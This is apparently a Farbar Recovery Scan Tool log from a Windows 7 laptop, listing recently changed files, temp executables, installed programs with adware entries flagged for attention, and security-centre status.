2015-07-12 19:07 - 2015-07-12 19:07 - 00000039 _____ C:\Windows\vbaddin.ini
2015-07-12 19:06 - 2015-07-12 19:06 - 00000162 _____ C:\Windows\ODBC.INI
2015-07-10 10:54 - 2015-07-10 10:54 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsyC9E1.tmp
2015-07-09 22:04 - 2015-07-09 22:04 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsd3073.tmp
2015-07-09 13:24 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Unity
2015-07-09 10:58 - 2015-07-09 10:58 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_WinUsb_01009.Wdf
2015-07-09 10:06 - 2015-07-09 10:06 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsf60A4.tmp
2015-07-08 19:30 - 2015-07-08 19:30 - 00000000 ____D C:\Users\Cukwenk\Documents\OneNote Notebooks
2015-07-06 21:24 - 2015-07-06 21:24 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf
2015-07-06 20:56 - 2015-07-25 23:05 - 00000000 ____D C:\Program Files\Mozilla Firefox
2015-07-06 20:56 - 2015-07-06 20:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Mozilla
2015-07-06 20:56 - 2015-07-06 20:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Mozilla
2015-07-06 20:56 - 2015-07-06 20:56 - 00000000 ____D C:\ProgramData\Mozilla
2015-07-06 20:46 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2015-07-06 20:46 - 2006-10-26 19:56 - 00032592 _____ (Microsoft Corporation) C:\Windows\system32\msonpmon.dll
2015-07-06 20:44 - 2015-07-06 20:44 - 00000000 ____D C:\Program Files\Microsoft Works
2015-07-06 20:43 - 2015-07-06 20:43 - 00000000 ____D C:\Windows\PCHEALTH
2015-07-06 20:43 - 2015-07-06 20:43 - 00000000 ____D C:\Program Files\Microsoft.NET
2015-07-06 20:43 - 2015-07-06 20:43 - 00000000 ____D C:\Program Files\Microsoft Visual Studio
2015-07-06 20:43 - 2015-07-06 20:43 - 00000000 ____D C:\Program Files\Common Files\DESIGNER
2015-07-06 20:41 - 2015-07-06 20:41 - 00000000 ____D C:\Program Files\Microsoft Visual Studio 8
2015-07-06 20:40 - 2015-07-12 19:07 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-07-06 20:40 - 2015-07-06 20:44 - 00000000 ____D C:\Program Files\Microsoft Office
2015-07-06 20:40 - 2015-07-06 20:40 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Microsoft Help
2015-07-06 20:13 - 2015-07-06 20:13 - 00000000 ____D C:\ProgramData\TEMP
2015-07-06 20:01 - 2015-07-06 20:00 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsx15FE.tmp
2015-07-06 19:37 - 2015-07-06 19:37 - 00000000 ____D C:\Program Files\WinRAR
2015-07-06 17:48 - 2015-07-06 17:48 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nshA2E0.tmp
2015-07-06 15:14 - 2015-07-06 15:13 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nskB3A3.tmp
2015-07-06 15:13 - 2015-07-06 15:13 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Opera Software
2015-07-06 15:13 - 2015-07-06 15:13 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Opera Software
2015-07-06 15:12 - 2015-07-25 11:39 - 00001385 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2015-07-06 15:11 - 2015-07-14 18:18 - 00000000 ____D C:\Program Files\Opera
2015-07-06 11:36 - 2015-07-06 11:36 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsd4268.tmp
2015-07-06 11:35 - 2015-07-25 14:31 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\systweak
2015-07-06 11:35 - 2015-02-19 13:09 - 00018200 _____ () C:\Windows\system32\roboot.exe
2015-07-06 10:52 - 2015-07-25 13:35 - 00000366 _____ C:\Windows\Tasks\APSnotifierPP1.job
2015-07-06 10:52 - 2015-07-25 13:35 - 00000364 _____ C:\Windows\Tasks\APSnotifierPP3.job
2015-07-06 10:52 - 2015-07-25 13:35 - 00000364 _____ C:\Windows\Tasks\APSnotifierPP2.job
2015-07-06 10:52 - 2015-07-10 13:28 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Adobe
2015-07-06 10:52 - 2015-07-06 10:52 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Macromedia
2015-07-06 10:50 - 2015-07-06 10:50 - 00000000 ____D C:\Windows\system32\Flash
2015-07-06 10:48 - 2015-07-06 10:48 - 00613255 _____ (CMI Limited) C:\Users\Cukwenk\AppData\Local\nsv2ACF.tmp
2015-07-06 10:48 - 2015-07-06 10:48 - 00000000 __SHD C:\Users\Cukwenk\AppData\Roaming\AnyProtectEx
2015-07-06 10:25 - 2015-07-25 12:44 - 00003130 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-6.job
2015-07-06 10:25 - 2015-07-25 11:20 - 00003466 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-1-7.job
2015-07-06 10:25 - 2015-07-25 11:20 - 00002438 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5_user.job
2015-07-06 10:25 - 2015-07-25 11:20 - 00002438 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-5.job
2015-07-06 10:24 - 2015-07-25 13:35 - 00002104 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-10_user.job
2015-07-06 10:24 - 2015-07-25 12:48 - 00000000 ____D C:\Program Files\8eaf934f-a3a3-4a5c-bd16-610e3f752e77
2015-07-06 10:24 - 2015-07-25 12:44 - 00005510 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-6.job
2015-07-06 10:24 - 2015-07-25 12:19 - 00000000 ____D C:\Program Files\CinemaPlus-3.2cV05.07
2015-07-06 10:24 - 2015-07-25 11:50 - 00000004 _____ C:\Windows\system32\029B560A371F4E00AB32838EBC01B9E7
2015-07-06 10:24 - 2015-07-25 11:20 - 00005174 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-7.job
2015-07-06 10:24 - 2015-07-25 11:20 - 00004150 _____ C:\Windows\Tasks\7ac5c440-fd07-4e61-a049-8edfc7759672-3.job
2015-07-06 10:24 - 2015-07-25 11:20 - 00000962 _____ C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job
2015-07-06 10:24 - 2015-07-25 10:45 - 00000966 _____ C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job
2015-07-06 10:24 - 2015-07-06 10:24 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\globalUpdate
2015-07-06 10:24 - 2015-07-06 10:24 - 00000000 ____D C:\Program Files\globalUpdate
2015-07-06 10:23 - 2015-07-25 13:43 - 00000000 ____D C:\Program Files\MiuiTab
2015-07-06 10:23 - 2015-07-25 11:20 - 00001048 _____ C:\Windows\Tasks\Crossbrowse.job
2015-07-06 10:23 - 2015-07-06 10:23 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Crossbrowse
2015-07-06 10:23 - 2015-07-06 10:23 - 00000000 ____D C:\ProgramData\IHProtectUpDate
2015-07-06 10:22 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\gmsd_ra_005010022
2015-07-06 10:22 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\gmsd_ra_005010022
2015-07-06 10:22 - 2015-07-25 11:20 - 00004712 _____ C:\Windows\system32\Oexufafono.ini
2015-07-06 10:22 - 2015-07-25 11:20 - 00002424 _____ C:\Windows\system32\OexufafonoOff.ini
2015-07-06 10:22 - 2015-07-06 10:22 - 00000000 _____ C:\Windows\prleth.sys
2015-07-06 10:22 - 2015-07-06 10:22 - 00000000 _____ C:\Windows\hgfs.sys
2015-07-06 10:21 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\mystartsearch
2015-07-06 10:21 - 2015-07-25 13:41 - 00000000 ____D C:\Program Files\shopperz
2015-07-06 10:21 - 2015-07-06 10:21 - 00000045 _____ C:\user.js
2015-07-06 10:21 - 2015-06-18 12:10 - 00056344 _____ (Cherimoya Ltd) C:\Windows\system32\Drivers\cherimoya.sys
2015-07-06 10:09 - 2009-06-10 09:39 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak
2015-07-06 10:08 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\CD674440-1436220497-11E1-8EA2-047D7BFA1DE9
2015-07-06 10:07 - 2015-07-06 10:07 - 00000000 ____D C:\Program Files\mbot_id_014010022
2015-07-01 16:48 - 2015-07-25 11:24 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\DMCache
2015-07-01 16:48 - 2015-07-22 22:44 - 00000000 ____D C:\Users\Cukwenk\Downloads\Video
2015-07-01 16:48 - 2015-07-12 19:04 - 00000000 ____D C:\Users\Cukwenk\Downloads\Compressed
2015-07-01 16:48 - 2015-07-01 16:48 - 00000000 ____D C:\ProgramData\IDM
2015-07-01 16:47 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2015-07-01 16:47 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2015-07-01 16:47 - 2015-07-12 19:08 - 00001118 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2015-07-01 16:47 - 2015-07-01 16:47 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\WinRAR
2015-06-30 23:10 - 2015-07-26 09:24 - 00078032 _____ (Absolute Software Corp.) C:\Windows\system32\rpcnet.dll
2015-06-30 23:10 - 2015-06-30 23:09 - 00078032 ____N (Absolute Software Corp.) C:\Windows\system32\rpcnet.exe
2015-06-29 22:19 - 2015-07-25 13:33 - 00000350 _____ C:\Windows\Tasks\DriverToolkit Autorun.job
2015-06-29 18:22 - 2015-07-25 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-06-29 18:22 - 2015-07-06 21:24 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Apple Computer
2015-06-29 18:22 - 2015-06-29 18:22 - 00001753 _____ C:\Users\Public\Desktop\iTunes.lnk
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Apple Computer
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\ProgramData\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\ProgramData\Apple Computer
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\Program Files\iTunes
2015-06-29 18:22 - 2015-06-29 18:22 - 00000000 ____D C:\Program Files\iPod
2015-06-29 18:22 - 2012-10-03 11:14 - 00026840 _____ (GEAR Software Inc.) C:\Windows\system32\Drivers\GEARAspiWDM.sys
2015-06-29 18:19 - 2015-06-29 18:19 - 00002519 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2015-06-29 18:19 - 2015-06-29 18:19 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Apple
2015-06-29 18:19 - 2015-06-29 18:19 - 00000000 ____D C:\Program Files\Apple Software Update
2015-06-29 18:18 - 2015-06-29 18:22 - 00000000 ____D C:\Program Files\Common Files\Apple
2015-06-29 18:18 - 2015-06-29 18:19 - 00000000 ____D C:\ProgramData\Apple
2015-06-29 18:18 - 2015-06-29 18:18 - 00000000 ____D C:\Program Files\Bonjour
2015-06-29 18:11 - 2015-07-25 12:29 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\TuneUp Software
2015-06-29 18:11 - 2015-06-29 21:33 - 00000000 __SHD C:\ProgramData\{FE8D473A-6F06-4F99-B5F4-BED72B2A038C}
2015-06-29 18:11 - 2015-06-29 18:12 - 00000000 ____D C:\ProgramData\TuneUp Software
2015-06-29 18:11 - 2015-06-29 18:11 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\TuneUp Software
2015-06-29 18:03 - 2015-02-23 23:23 - 00246920 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2015-06-29 18:02 - 2015-07-25 21:56 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\OpenCandy
2015-06-29 18:02 - 2015-07-25 11:54 - 00000000 ____D C:\Program Files\GRETECH
2015-06-29 18:01 - 2015-06-29 18:01 - 00000000 ____D C:\ProgramData\McAfee
2015-06-29 18:00 - 2015-07-25 12:49 - 00000000 ____D C:\Program Files\Adobe
2015-06-29 18:00 - 2015-07-16 17:40 - 00000000 ____D C:\ProgramData\Adobe
2015-06-29 18:00 - 2015-07-16 17:40 - 00000000 ____D C:\Program Files\Common Files\Adobe
2015-06-29 17:56 - 2015-07-22 21:45 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Adobe
2015-06-29 17:53 - 2015-07-25 11:24 - 00000000 ____D C:\Program Files\SMADAV
2015-06-29 17:53 - 2015-06-29 17:53 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\Smadav
2015-06-29 17:51 - 2012-06-02 10:19 - 01933848 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-06-29 17:51 - 2012-06-02 10:19 - 00053784 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-06-29 17:51 - 2012-06-02 10:19 - 00045080 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-06-29 17:51 - 2012-06-02 10:12 - 02422272 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-06-29 17:50 - 2012-06-02 10:19 - 00577048 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-06-29 17:50 - 2012-06-02 10:19 - 00171904 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-06-29 17:50 - 2012-06-02 10:19 - 00035864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-06-29 17:50 - 2012-06-02 10:12 - 00088576 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-06-29 17:50 - 2012-06-02 10:12 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-06-29 17:49 - 2015-07-25 21:57 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Apps\2.0
2015-06-29 17:49 - 2015-07-25 14:09 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Google
2015-06-29 17:49 - 2015-06-29 17:49 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Deployment
2015-06-29 17:46 - 2015-06-29 17:46 - 00000000 ____D C:\Windows\Options
2015-06-29 17:46 - 2015-06-29 17:46 - 00000000 ____D C:\ProgramData\Atheros
2015-06-29 17:46 - 2015-06-29 17:46 - 00000000 ____D C:\Program Files\Atheros
2015-06-29 17:46 - 2012-04-19 17:54 - 02239488 _____ (Qualcomm Atheros Communications, Inc.) C:\Windows\system32\Drivers\athr.sys
2015-06-29 17:08 - 2015-06-29 17:08 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\DriverToolkit

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-07-26 13:49 - 2015-06-23 14:33 - 00017920 _____ C:\Windows\system32\rpcnetp.exe
2015-07-26 09:47 - 2009-07-13 16:34 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-26 09:47 - 2009-07-13 16:34 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-26 09:27 - 2015-06-23 14:37 - 01277917 _____ C:\Windows\WindowsUpdate.log
2015-07-26 09:24 - 2009-07-13 16:53 - 00021668 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-07-26 09:24 - 2009-07-13 16:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-26 00:38 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\registration
2015-07-26 00:37 - 2009-07-13 14:37 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2015-07-26 00:21 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\Microsoft.NET
2015-07-25 23:57 - 2015-06-23 15:01 - 00792708 _____ C:\Windows\system32\PerfStringBackup.INI
2015-07-25 23:12 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\system32\NDF
2015-07-25 22:57 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\system32\inetsrv
2015-07-25 21:57 - 2015-06-24 16:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRS Labs
2015-07-25 21:57 - 2015-06-24 15:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TOSHIBA
2015-07-25 21:57 - 2015-06-24 09:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverToolkit
2015-07-25 21:57 - 2015-06-24 08:01 - 00000000 ____D C:\Users\Cukwenk\AppData\Roaming\DRPSu
2015-07-25 21:57 - 2009-07-13 16:52 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-07-25 21:57 - 2009-07-13 16:52 - 00000000 ____D C:\Program Files\MSBuild
2015-07-25 21:57 - 2009-07-13 14:37 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-25 21:57 - 2009-07-13 14:37 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-25 21:56 - 2015-06-23 14:55 - 00000000 ___RD C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-25 21:56 - 2015-06-23 14:55 - 00000000 ___RD C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-25 21:56 - 2015-06-23 14:55 - 00000000 ____D C:\Users\Cukwenk
2015-07-25 12:12 - 2015-06-23 15:33 - 00000000 ____D C:\Windows\Panther
2015-07-25 12:03 - 2015-06-23 14:55 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\VirtualStore
2015-07-25 11:39 - 2015-06-23 14:55 - 00001717 _____ C:\Users\Cukwenk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-07-25 11:27 - 2009-07-13 14:37 - 00000000 ___RD C:\Users\Public
2015-07-20 16:25 - 2012-12-22 15:24 - 00000000 __SHD C:\[Smad-Cage]
2015-07-12 19:07 - 2009-07-13 14:37 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2015-07-09 06:43 - 2014-03-31 06:27 - 00048496 _____ (Absolute Software Corporation) C:\Windows\system32\identprv.dll
2015-07-06 20:43 - 2009-07-13 19:49 - 00000000 ____D C:\Windows\ShellNew
2015-07-06 20:41 - 2009-07-13 14:37 - 00000000 ____D C:\Program Files\Common Files\System
2015-07-06 20:41 - 2009-07-13 14:04 - 00000478 _____ C:\Windows\win.ini
2015-07-06 10:24 - 2015-06-24 15:42 - 00000000 ____D C:\Program Files\AmIcoSingLun
2015-07-02 13:21 - 2009-07-13 14:37 - 00000000 ____D C:\Windows\rescache
2015-06-30 04:50 - 2015-06-23 14:35 - 00017920 _____ C:\Windows\system32\rpcnetp.dll
2015-06-29 21:33 - 2015-06-24 15:48 - 00000000 ____D C:\Users\Cukwenk\AppData\Local\Downloaded Installations
2015-06-29 17:46 - 2015-06-24 15:20 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
2015-06-29 17:08 - 2015-06-24 09:34 - 00000000 ____D C:\Program Files\DriverToolkit

Some files in TEMP:
====================
C:\Users\Cucuk\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Cukwenk\AppData\Local\Temp\DseShExt-x86.dll
C:\Users\Cukwenk\AppData\Local\Temp\install1215124.exe
C:\Users\Cukwenk\AppData\Local\Temp\of3w84315.exe
C:\Users\Cukwenk\AppData\Local\Temp\oo2.exe
C:\Users\Cukwenk\AppData\Local\Temp\oprun10610.exe
C:\Users\Cukwenk\AppData\Local\Temp\qqpcmgr_v10.10.16434.218_72830_Silence.exe
C:\Users\Cukwenk\AppData\Local\Temp\SDShelEx-win32.dll
C:\Users\Cukwenk\AppData\Local\Temp\setup3.exe
C:\Users\Cukwenk\AppData\Local\Temp\SpOrder.dll
C:\Users\Cukwenk\AppData\Local\Temp\Uninstall.exe
C:\Users\Cukwenk\AppData\Local\Temp\z1upd92307.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-07-25 08:18

==================== End of log ============================

 

Addition

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 25-07-2015
Ran by Cucuk at 2015-07-26 15:29:41
Running from C:\Users\Cucuk\Desktop
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3110752661-1710530649-2414096437-500 - Administrator - Disabled)
Cucuk (S-1-5-21-3110752661-1710530649-2414096437-1001 - Administrator - Enabled) => C:\Users\Cucuk
Guest (S-1-5-21-3110752661-1710530649-2414096437-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: 电脑管家系统防护 (Enabled - Up to date) {6F9C3F92-B625-0E47-F0B1-447602EC65F5}
AV: Rising Antivirus (Enabled - Up to date) {DBC966C2-BD90-87CD-5A01-4DFB1D2EC867}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: 电脑管家系统防护 (Enabled - Up to date) {D4FDDE76-901F-01C9-CA01-7F04796B2F48}
AS: Rising Antivirus (Enabled - Up to date) {60A88726-9BAA-8843-60B1-768966A982DA}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 18 NPAPI (HKLM\...\Adobe Flash Player NPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
Advanced-System Protector (HKLM\...\00212D92-C5D8-4ff4-AE50-B20F0F85C40A_Systweak_Ad~9338DF9D_is1) (Version: 2.2.1000.15792 - Advanced System Protector) <==== ATTENTION
Alcor Micro USB Card Reader (HKLM\...\AmUStor) (Version: 4.3.17.00279 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (Version: 4.3.17.00279 - Alcor Micro Corp.) Hidden
AnyProtect (HKLM\...\AnyProtect) (Version: 1.0.0.4 - CMI Limited) <==== ATTENTION
AnySend (HKLM\...\ASPackage) (Version:  - CMI Limited) <==== ATTENTION!
Apple Application Support (32-bit) (HKLM\...\{AFA1153A-F547-409B-B837-3A0D6C5A3FEC}) (Version: 3.1.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{E1DB0812-2D60-43DB-AE09-6C7027D93B28}) (Version: 8.1.1.3 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.0.12.13 - Atheros Communications Inc.)
Atheros Driver Installation Program (HKLM\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 9.2 - Atheros)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
Buzzdock (HKLM\...\{cfd32d46-7d3f-483f-bace-7172aec5592d}) (Version:  - Alactro LLC) <==== ATTENTION
CinemaPlus-3.2cV05.07 (HKLM\...\CinemaPlus-3.2cV05.07) (Version: 1.36.01.22 - Cinema PlusV05.07) <==== ATTENTION
CinemaPlus-3.2cV14.07 (HKLM\...\CinemaPlus-3.2cV14.07) (Version: 1.36.01.22 - Cinema PlusV14.07) <==== ATTENTION
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 8.51.2.64 - Conexant)
DriverToolkit version 8.4.0.0 (HKLM\...\{D66BF89F-B0A2-48F5-A2E4-242EB645AB76}_is1) (Version: 8.4.0.0 - Megaify Software)
GamesDesktop 091.005010022 (HKLM\...\gmsd_ra_005010022_is1) (Version:  - GAMESDESKTOP) <==== ATTENTION
globalupdate Helper (Version: 1.3.25.0 - globalupdate Inc.) Hidden <==== ATTENTION
GoHD (HKLM\...\GoHD) (Version: 1.36.01.22 - InstallMoon) <==== ATTENTION
GOM Player (HKLM\...\GOM Player) (Version: 2.2.69.5227 - Gretech Corporation)
Google Chrome (HKLM\...\Google Chrome) (Version: 44.0.2403.107 - Google Inc.)
Google Update Helper (Version: 1.3.26.9 - Google Inc.) Hidden
Intel® Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.0.0.1032 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.4.220 - Intel Corporation)
iTunes (HKLM\...\{CE1F04C7-79BC-4219-BE6A-BA490224D4B5}) (Version: 12.1.2.27 - Apple Inc.)
Java 8 Update 25 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Jungle Net (HKLM\...\Jungle Net) (Version: 2.0.5672.17745 - Jungle Net)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Visio Professional 2007 (HKLM\...\VISPRO) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
mystartsearch uninstall (HKLM\...\mystartsearch uninstall) (Version:  - mystartsearch) <==== ATTENTION
OffersWizard Network System Driver (HKLM\...\inethnfd) (Version: 1.0.0.3001 - ) <==== ATTENTION
Opera Stable 30.0.1835.125 (HKLM\...\Opera 30.0.1835.125) (Version: 30.0.1835.125 - Opera Software)
Premium Sound HD (HKLM\...\{3007FF9F-5B2C-41FF-8BFC-08BF25DB2681}) (Version: 1.12.1800 - SRS Labs, Inc.)
Quebles Emoticons (HKLM\...\{8E8C2E2D-7F21-2CF5-0ADB-64935121ECF0}) (Version:  - "") <==== ATTENTION
SavePass 1.1 (HKLM\...\SavePass 1.1) (Version: 1.36.01.22 - OB) <==== ATTENTION
See Results Hub (HKLM\...\See Results Hub) (Version: 2.0.5672.17745 - See Results Hub)
Setup (HKLM\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version:  - )
shopperz 2.0.0.461 (HKLM\...\{3c9ce603-44cc-4997-a166-239e6186c6ef}_is1) (Version: 2.0.0.461 - shopperz) <==== ATTENTION
Software Version Updater (HKLM\...\{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}) (Version: 1.1.4.2 - ) <==== ATTENTION
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.39.0 - Synaptics Incorporated)
TOSHIBA Face Recognition (HKLM\...\InstallShield_{C730E42C-935A-45BB-A0C5-37E5234D111B}) (Version: 3.1.18.32 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.11 - TOSHIBA Corporation)
TOSHIBA Media Controller (HKLM\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.87.5 - TOSHIBA CORPORATION)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.6.0021.320203 - TOSHIBA Corporation)
TOSHIBA Wireless LAN Indicator (HKLM\...\{5B01BCB7-A5D3-476F-AF11-E515BA206591}) (Version: 1.0.5 - TOSHIBA CORPORATION)
TrimEdit (HKLM\...\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{426ab601}) (Version:  - Software Publisher) <==== ATTENTION
